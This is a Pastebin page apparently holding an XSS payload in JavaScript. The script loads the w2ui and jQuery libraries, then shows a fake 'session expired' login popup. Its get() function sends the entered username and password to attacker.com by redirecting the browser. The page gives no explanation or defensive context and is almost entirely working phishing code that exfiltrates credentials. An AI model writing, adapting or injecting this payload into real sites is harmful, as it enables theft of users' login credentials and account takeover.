Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- var x = document.createElement('link');
- x.rel = 'stylesheet';
- x.href='http://w2ui.com/src/w2ui-1.4.2.min.css';
- document.getElementsByTagName('head')[0].appendChild(x);
- x = document.createElement('script');
- x.src='http://w2ui.com/src/w2ui-1.4.2.min.js';
- document.getElementsByTagName('head')[0].appendChild(x);
- x = document.createElement('script');
- x.src='http://ajax.googleapis.com/ajax/libs/jquery/2.1.0/jquery.min.js';
- document.getElementsByTagName('head')[0].appendChild(x);
- setTimeout(payload, 2000);
- function payload() {
- w2popup.open({
- width: 400,
- height: 300,
- title: '<div style="">Log-in for session</div>',
- body: '<div class="w2ui-centered" style="position:static; margin-top:20%">\
- Your session has expired. Please log-in again</div>\
- <div style="margin-left:17%">\
- <table>\
- <tr>\
- <td>Username:</td>\
- <td><input type="text" name="user" class="user"></td>\
- </tr>\
- <tr>\
- <td>Password:</td>\
- <td><input type="password" name="pass" class="pass"></td>\
- </tr>\
- </table>\
- </div>',
- buttons: '<button class="btn" onclick="get()">Login</button>'
- });
- }
- function get() {
- var username = $(".user").val();
- var password = $(".pass").val();
- window.location = "http://attacker.com/?u=" + username + "&p=" + password;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement